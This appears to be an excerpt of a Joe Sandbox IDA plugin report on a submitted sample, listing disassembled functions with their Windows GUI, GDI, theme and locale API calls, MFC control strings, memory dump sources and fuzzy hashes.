Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: AddressProc$Activate
String ID: BeginBufferedPaint$DrawThemeParentBackground$DrawThemeTextEx$DwmDefWindowProc$DwmExtendFrameIntoClientArea$DwmIsCompositionEnabled$EndBufferedPaint$UxTheme.dll$dwmapi.dll
API String ID: 2388279185-3875329446
Opcode ID: db113bf69160840219af2a1b25601288a3531b0b859b97781bd93e4af2b2ed8a
Instruction ID: f34378952ae01e8e5cb1bc4e34835c58ada0eed43abcb5e7e622611992711da5
Opcode Fuzzy Hash: db113bf69160840219af2a1b25601288a3531b0b859b97781bd93e4af2b2ed8a
Instruction Fuzzy Hash: A32144B15807869BC721AF769C88EDBFBE4EF56704F41083FE4BA93211D770A450CA50

Function 001F3E96 Relevance: 26.3, APIs: 7, Strings: 8, Instructions: 73libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 001C94E4: ActivateActCtx.KERNEL32(?,?,0031BB48,00000010,001C95B9,KERNEL32.DLL), ref: 001C9504

GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 001F3EF8
GetProcAddress.KERNEL32(?,CloseThemeData), ref: 001F3F05
GetProcAddress.KERNEL32(?,DrawThemeBackground), ref: 001F3F12
GetProcAddress.KERNEL32(?,GetThemeColor), ref: 001F3F1F
GetProcAddress.KERNEL32(?,GetThemeSysColor), ref: 001F3F2C
GetProcAddress.KERNEL32(?,GetCurrentThemeName), ref: 001F3F39
GetProcAddress.KERNEL32(?,GetWindowTheme), ref: 001F3F46

Strings

UxTheme.dll, xrefs: 001F3E9E
GetThemeSysColor, xrefs: 001F3F21
GetCurrentThemeName, xrefs: 001F3F2E
DrawThemeBackground, xrefs: 001F3F07
OpenThemeData, xrefs: 001F3EF2
GetThemeColor, xrefs: 001F3F14
GetWindowTheme, xrefs: 001F3F3B
CloseThemeData, xrefs: 001F3EFA

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: AddressProc$Activate
String ID: CloseThemeData$DrawThemeBackground$GetCurrentThemeName$GetThemeColor$GetThemeSysColor$GetWindowTheme$OpenThemeData$UxTheme.dll
API String ID: 2388279185-1975976892
Opcode ID: 909a67f350e07626b617d100bd1e11791827ad122d01fcb17e392f01c3b5c7e4
Instruction ID: 701e1c43dcf82f7b8c96700bfa91c5e3ed2fc065060e9064c94f5a251b7e6289
Opcode Fuzzy Hash: 909a67f350e07626b617d100bd1e11791827ad122d01fcb17e392f01c3b5c7e4
Instruction Fuzzy Hash: 173145B1990B949FC730AF2B8944816FBF9BEA5B103518D1FE59682A60D7B6A050CF40

Function 001FC01A Relevance: 25.8, APIs: 17, Instructions: 271windowCOMMON

Download Yara Rule

APIs

InflateRect.USER32(?,00000004,00000004), ref: 001FC077
InvalidateRect.USER32(?,?,00000001), ref: 001FC089
UpdateWindow.USER32(?), ref: 001FC092
GetMessageW.USER32(?,00000000,0000000F,0000000F), ref: 001FC0D1
DispatchMessageW.USER32(?), ref: 001FC0DF
PeekMessageW.USER32(?,00000000,0000000F,0000000F,00000000), ref: 001FC0ED
GetCapture.USER32 ref: 001FC0F9
SetCapture.USER32(?), ref: 001FC105
GetCapture.USER32 ref: 001FC111
GetWindowRect.USER32(?,?), ref: 001FC13B
SetCursorPos.USER32(?,?), ref: 001FC15E
GetCapture.USER32 ref: 001FC164
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 001FC17C
DispatchMessageW.USER32(?), ref: 001FC1A2
ReleaseCapture.USER32 ref: 001FC1E0
IsWindow.USER32(?), ref: 001FC1E9
SendMessageW.USER32(?,00000010,00000000,00000000), ref: 001FC202

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Message$Capture$RectWindow$Dispatch$CursorInflateInvalidatePeekReleaseSendUpdate
String ID:
API String ID: 4077352625-0
Opcode ID: 018c60044e81811bf432c991a6f3b3c94d8c25106a009311c7d4cc32474ca085
Instruction ID: a747d9ac605186126e5b2edd93b62117a226938b1fffdd9f2160686e78e9015e
Opcode Fuzzy Hash: 018c60044e81811bf432c991a6f3b3c94d8c25106a009311c7d4cc32474ca085
Instruction Fuzzy Hash: FF913E7690420DAFCB14EFE4ED89DBEBBB9EB54310B250429F605E7251DB30AD40DB91

Function 0027593C Relevance: 24.4, APIs: 16, Instructions: 368COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00275943
GetCursorPos.USER32(?), ref: 002759F5
IsRectEmpty.USER32(00000000), ref: 00275A29
IsRectEmpty.USER32(?), ref: 00275A4F
IsRectEmpty.USER32(00000000), ref: 00275A6B
GetWindowRect.USER32(?,00000000), ref: 00275A91
SetRectEmpty.USER32(?), ref: 00275B48

Part of subcall function 001C8E6A: _malloc.LIBCMT ref: 001C8E88

GetWindowRect.USER32(?,00000000), ref: 00275AC5
PtInRect.USER32(00000000,?,00000000), ref: 00275B05
OffsetRect.USER32(00000000,?,00000000), ref: 00275B1D

Part of subcall function 0022AB47: __EH_prolog3.LIBCMT ref: 0022AB4E
Part of subcall function 0022AB47: SetRectEmpty.USER32(?), ref: 0022AC55
Part of subcall function 0022AB47: SetRectEmpty.USER32(?), ref: 0022AC5E

OffsetRect.USER32(00000000,?,?), ref: 00275CA7
IsRectEmpty.USER32(?), ref: 00275CCC
IsRectEmpty.USER32(?), ref: 00275CF1
PtInRect.USER32(00000000,?,?), ref: 00275D01
OffsetRect.USER32(00000000,?,?), ref: 00275D2A
IsRectEmpty.USER32(?), ref: 00275D41

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Rect$Empty$Offset$Window$CursorH_prolog3H_prolog3__malloc
String ID:
API String ID: 1330315114-0
Opcode ID: 84449fd0c3d5ccf4dafdcdb40afa257075d9b8ff42aa54412cd62c5ffa564d7b
Instruction ID: 1263b1c5fe6452b8d302db5dc697d899e67063a9737ffc7f1a9760a5b41411d6
Opcode Fuzzy Hash: 84449fd0c3d5ccf4dafdcdb40afa257075d9b8ff42aa54412cd62c5ffa564d7b
Instruction Fuzzy Hash: 23E16E71910629DFCF25DFA4C888AAEBBB9FF04700F148169E909EB259DB70D951CF90

Function 002034C2 Relevance: 24.2, APIs: 16, Instructions: 245windowCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 002034C9
CreateRectRgnIndirect.GDI32(?), ref: 00203506
CopyRect.USER32(?,?), ref: 0020351C
InflateRect.USER32(?,?,?), ref: 00203532
IntersectRect.USER32(?,?,?), ref: 00203540
CreateRectRgnIndirect.GDI32(?), ref: 0020354A
CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 0020355F

Part of subcall function 001F0174: CombineRgn.GDI32(?,00000003,?,?), ref: 001F0199

CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 002035C7
SetRectRgn.GDI32(?,0000000A,?,?,?), ref: 002035E4
CopyRect.USER32(?,0000000A), ref: 002035EF
InflateRect.USER32(?,?,?), ref: 00203605
IntersectRect.USER32(?,?,0000000A), ref: 00203611
SetRectRgn.GDI32(?,?,?,?,0000000A), ref: 00203626
CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 00203652

Part of subcall function 00203324: CreateBitmap.GDI32(00000008,00000008,00000001,00000001,0020358B), ref: 0020336D
Part of subcall function 00203324: CreatePatternBrush.GDI32(00000000), ref: 0020337A
Part of subcall function 00203324: DeleteObject.GDI32(00000000), ref: 00203386

Part of subcall function 001D06C9: SelectObject.GDI32(?,00000000), ref: 001D06EF
Part of subcall function 001D06C9: SelectObject.GDI32(?,?), ref: 001D0705

PatBlt.GDI32(?,?,?,?,?,005A0049), ref: 002036C3
PatBlt.GDI32(?,?,?,?,?,005A0049), ref: 00203718

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Rect$Create$Object$CopyIndirectInflateIntersectSelect$BitmapBrushCombineDeleteH_prolog3_Pattern
String ID:
API String ID: 3107162742-0
Opcode ID: 34c3ff191d176d771cdd45cd8f1d24fd3626716fd7295d98738a7b1674188eb0
Instruction ID: 3ae3c1a5843b8d7f43c414e76038f316534e16c2121b6555876847d82fe01818
Opcode Fuzzy Hash: 34c3ff191d176d771cdd45cd8f1d24fd3626716fd7295d98738a7b1674188eb0
Instruction Fuzzy Hash: 06A113B1900219AFCF05EFE4EC99EFEBBB9BF18300F14401AF506A6251DB359A55CB64

Function 0021C792 Relevance: 24.2, APIs: 16, Instructions: 182windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000201,00000201,00000001), ref: 0021C82B
SendMessageW.USER32(00000000,00000084,00000000,?), ref: 0021C848
ReleaseCapture.USER32 ref: 0021C883
GetMessageW.USER32(?,00000000,000000A1,000000A1), ref: 0021C892
PeekMessageW.USER32(?,00000000,?,?,00000001), ref: 0021C8A6
DispatchMessageW.USER32(?), ref: 0021C8AD
DispatchMessageW.USER32(?), ref: 0021C958
GetCursorPos.USER32(?), ref: 0021C962
PeekMessageW.USER32(?,00000000,?,?,00000001), ref: 0021C983

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Message$Peek$Dispatch$CaptureCursorReleaseSend
String ID:
API String ID: 597789953-0
Opcode ID: 1d9db196dc86268ec42f6c79bf436e852c89a4594c011ae1176a6e4e7561c99a
Instruction ID: c517f67cf95f1e3216396fce905c4d5d95bb7e7fa137b539041505132393e5b7
Opcode Fuzzy Hash: 1d9db196dc86268ec42f6c79bf436e852c89a4594c011ae1176a6e4e7561c99a
Instruction Fuzzy Hash: 8551AE796A0241ABEB215F64DCC8EFFB6ECEB65B00F304425F542D6190C675D9D0CB61

Function 002336FF Relevance: 24.2, APIs: 16, Instructions: 157windowCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00233706
CreateCompatibleDC.GDI32(00000000), ref: 0023373C
GetObjectW.GDI32(?,00000018,?), ref: 00233753
SelectObject.GDI32(?,?), ref: 0023377F
CreateCompatibleBitmap.GDI32(?,?,?), ref: 002337A1
SelectObject.GDI32(?,00000000), ref: 002337B4
CreateCompatibleDC.GDI32(?), ref: 002337C7
SelectObject.GDI32(?,?), ref: 002337D8
SelectObject.GDI32(?,00000000), ref: 002337E9
DeleteObject.GDI32(?), ref: 002337EE
BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 0023381A
GetPixel.GDI32(?,?,?), ref: 00233839
SetPixel.GDI32(?,?,?,00000000), ref: 00233880
SelectObject.GDI32(?,?), ref: 002338A4
SelectObject.GDI32(?,00000000), ref: 002338AC
DeleteObject.GDI32(?), ref: 002338B4

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Object$Select$CompatibleCreate$DeletePixel$BitmapH_prolog3
String ID:
API String ID: 3639146769-0
Opcode ID: b38d23fce107efe7cf79d2d476c2ca6f958ffb7389a1640c45243f1db5bb5602
Instruction ID: abafe44a88be8aa10ba9ed5a3fa7f1b0aeb37b533435f38882157b8dbb5cf44f
Opcode Fuzzy Hash: b38d23fce107efe7cf79d2d476c2ca6f958ffb7389a1640c45243f1db5bb5602
Instruction Fuzzy Hash: 6A51F4B181024AEBCF12DFA4DD49AEEBB72FF18310F204129F515A61A0DB715B66DB60

Function 001C9583 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 126libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 001C94E4: ActivateActCtx.KERNEL32(?,?,0031BB48,00000010,001C95B9,KERNEL32.DLL), ref: 001C9504

GetProcAddress.KERNEL32(00000000,GetThreadPreferredUILanguages), ref: 001C95C8
_memset.LIBCMT ref: 001C95F4
_wcstoul.LIBCMT ref: 001C963C

Part of subcall function 002BF54B: wcstoxl.LIBCMT ref: 002BF55B

_wcslen.LIBCMT ref: 001C965D

Part of subcall function 002BE629: __getptd_noexit.LIBCMT ref: 002BE629

GetUserDefaultUILanguage.KERNEL32 ref: 001C966D
ConvertDefaultLocale.KERNEL32(?), ref: 001C9694
ConvertDefaultLocale.KERNEL32(?), ref: 001C96A3
GetSystemDefaultUILanguage.KERNEL32 ref: 001C96AC
ConvertDefaultLocale.KERNEL32(?), ref: 001C96C8
ConvertDefaultLocale.KERNEL32(?), ref: 001C96D7

Strings

KERNEL32.DLL, xrefs: 001C95A7
GetThreadPreferredUILanguages, xrefs: 001C95C2
e, xrefs: 001C9613

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Default$ConvertLocale$Language$ActivateAddressProcSystemUser__getptd_noexit_memset_wcslen_wcstoulwcstoxl
String ID: GetThreadPreferredUILanguages$KERNEL32.DLL$e
API String ID: 1566020816-2285706205
Opcode ID: 7bac7fa92c504d78bf1b0325b5d14f6bfa3e4df0e8a43ea2dbe33c3e4c03edf7
Instruction ID: 87f17a7daf16f7547d803c86b1f502acd544c8baf52cfe2f8d5aa0cf6ff45678
Opcode Fuzzy Hash: 7bac7fa92c504d78bf1b0325b5d14f6bfa3e4df0e8a43ea2dbe33c3e4c03edf7
Instruction Fuzzy Hash: F7418371911228ABDB21AF65DC89FED77B8AB58710F4104AEE909E7180DB74DE81CF90

Function 00216A40 Relevance: 22.8, APIs: 15, Instructions: 328COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00216AC5
GetClientRect.USER32(?,?), ref: 00216AFF
GetWindowRect.USER32(?,?), ref: 00216B5A
EqualRect.USER32(?,?), ref: 00216B68
GetWindowRect.USER32(?,?), ref: 00216B8E

Part of subcall function 001D701F: AdjustWindowRectEx.USER32(?,00000000,00000000,00000000), ref: 001D7045

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Rect$Window$AdjustClientEqual
String ID:
API String ID: 2779716228-0
Opcode ID: 297be2ad21109fc3d3ed8a6108f1e127cd4c1a9a9ab3e06d33892ddb7125c5e5
Instruction ID: 5c94cbae85e1885301f0903fcfdaea5b1ba6ab694f476341909b6285bd67f1b0
Opcode Fuzzy Hash: 297be2ad21109fc3d3ed8a6108f1e127cd4c1a9a9ab3e06d33892ddb7125c5e5
Instruction Fuzzy Hash: 93D1F471E1021AAFCF01DFE8C9889EEBBB9FF48700F14411AE505AB254DB70AA51CF90

Function 0020EB18 Relevance: 22.7, APIs: 15, Instructions: 232timeCOMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 0020EB4E
InflateRect.USER32(?,00000000,00000000), ref: 0020EB7D
SetRectEmpty.USER32(?), ref: 0020EC1B
SetRectEmpty.USER32(?), ref: 0020EC24
GetSystemMetrics.USER32(00000002), ref: 0020EC45
KillTimer.USER32(?,00000002), ref: 0020ECDF
EqualRect.USER32(?,?), ref: 0020ED01
EqualRect.USER32(?,?), ref: 0020ED12
EqualRect.USER32(?,?), ref: 0020ED63
InvalidateRect.USER32(?,?,00000001), ref: 0020ED7C
InvalidateRect.USER32(?,?,00000001), ref: 0020ED84
EqualRect.USER32(?,?), ref: 0020ED98
InvalidateRect.USER32(?,?,00000001), ref: 0020EDAB
InvalidateRect.USER32(?,?,00000001), ref: 0020EDB3
UpdateWindow.USER32(?), ref: 0020EDC6

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Rect$EqualInvalidate$Empty$ClientInflateKillMetricsSystemTimerUpdateWindow
String ID:
API String ID: 2140115980-0
Opcode ID: d451b8a302acf0ec6a085c9a83be076bb7cf39a729d9e99a3a90dd371dd625fd
Instruction ID: b04d75dc3b4276d73980c7c9917d064ffccfd6367098a63717b0065538193440
Opcode Fuzzy Hash: d451b8a302acf0ec6a085c9a83be076bb7cf39a729d9e99a3a90dd371dd625fd
Instruction Fuzzy Hash: C191F77191021ADFCF11DFA4D984AEE77B9BF08300F1545B6EC09AB256DBB1A981CB60

Function 00207CAF Relevance: 22.7, APIs: 15, Instructions: 199windowCOMMON

Download Yara Rule

APIs

GetDlgCtrlID.USER32(?), ref: 00207D19
GetDlgItem.USER32(?,?), ref: 00207DA3
ShowWindow.USER32(00000000,00000000,?,?), ref: 00207DAE
GetMenu.USER32(?), ref: 00207DC0
InvalidateRect.USER32(?,00000000,00000001), ref: 00207DDB

Part of subcall function 001CACFF: __CxxThrowException@8.LIBCMT ref: 001CAD15
Part of subcall function 001CACFF: __EH_prolog3.LIBCMT ref: 001CAD22

GetDlgItem.USER32(?,0000E900), ref: 00207E18
SetWindowLongW.USER32(00000000,000000F4,0000EA21), ref: 00207E35
GetDlgItem.USER32(?,0000EA21), ref: 00207E4E
GetDlgItem.USER32(?,0000E900), ref: 00207E64
SetWindowLongW.USER32(00000000,000000F4,0000EA21), ref: 00207E76
SetWindowLongW.USER32(?,000000F4,0000E900), ref: 00207E82
InvalidateRect.USER32(00000000,00000000,00000001,?,?), ref: 00207E95
SetMenu.USER32(?,00000000), ref: 00207EAC
GetDlgItem.USER32(?,00000000), ref: 00207EF3
ShowWindow.USER32(?,00000005), ref: 00207F01

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: ItemWindow$Long$InvalidateMenuRectShow$CtrlException@8H_prolog3Throw
String ID:
API String ID: 3935238147-0
Opcode ID: 6562c14dce45091aadfdfdc138f7b7bf564ee62614e20af380ab5323caa8c44e
Instruction ID: 018727a5464c7126a7d8fb974654e04b9231bb9f3eaacea1a6fca5461da90955
Opcode Fuzzy Hash: 6562c14dce45091aadfdfdc138f7b7bf564ee62614e20af380ab5323caa8c44e
Instruction Fuzzy Hash: 0D815E30A14701DFDB219F24C88CAAABBF5FF49710F244969E59A9B2A1DB71ED50CF40

Function 00206102 Relevance: 21.2, APIs: 1, Strings: 11, Instructions: 185COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00206109

Part of subcall function 001C8E6A: _malloc.LIBCMT ref: 001C8E88

Part of subcall function 0028FF85: __EH_prolog3.LIBCMT ref: 0028FF8C

Strings

MFCEditBrowse, xrefs: 00206195
MFCLink, xrefs: 00206203
MFCShellList, xrefs: 002062DF
MFCPropertyGrid, xrefs: 002062A8
MFCMenuButton, xrefs: 00206271
MFCShellTree, xrefs: 0020630F
MFCVSListBox, xrefs: 0020633F
MFCMaskedEdit, xrefs: 0020623A
MFCColorButton, xrefs: 0020615E
MFCButton, xrefs: 00206124
MFCFontComboBox, xrefs: 002061CC

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: H_prolog3$_malloc
String ID: MFCButton$MFCColorButton$MFCEditBrowse$MFCFontComboBox$MFCLink$MFCMaskedEdit$MFCMenuButton$MFCPropertyGrid$MFCShellList$MFCShellTree$MFCVSListBox
API String ID: 1683881009-2110171958
Opcode ID: e78a35ba3f1539833dd2ec4be19116c21935ca3571344e631df29098d7ccdf8c
Instruction ID: 37c81e7b3dd34d9cc2319d6214b0ee3db18e229468a7fea1715e24ebc7106681
Opcode Fuzzy Hash: e78a35ba3f1539833dd2ec4be19116c21935ca3571344e631df29098d7ccdf8c
Instruction Fuzzy Hash: B651F730A64355DADF54FBB498A6BBD66A02F38F04F54406DF41E961C3EFB08B708692

Function 00233FEA Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 172COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00233FF4
GetObjectW.GDI32(00000000,00000018,?), ref: 00234026
GetObjectW.GDI32(?,00000054,?), ref: 0023405E
CreateCompatibleDC.GDI32(00000000), ref: 002340F4
SelectObject.GDI32(?,?), ref: 00234113
GetPixel.GDI32(?,?,00000000), ref: 002341A0
GetPixel.GDI32(?,?,00000000), ref: 002341B2
SetPixel.GDI32(?,?,00000000,00000000), ref: 002341C1
SetPixel.GDI32(?,?,00000000,?), ref: 002341D3
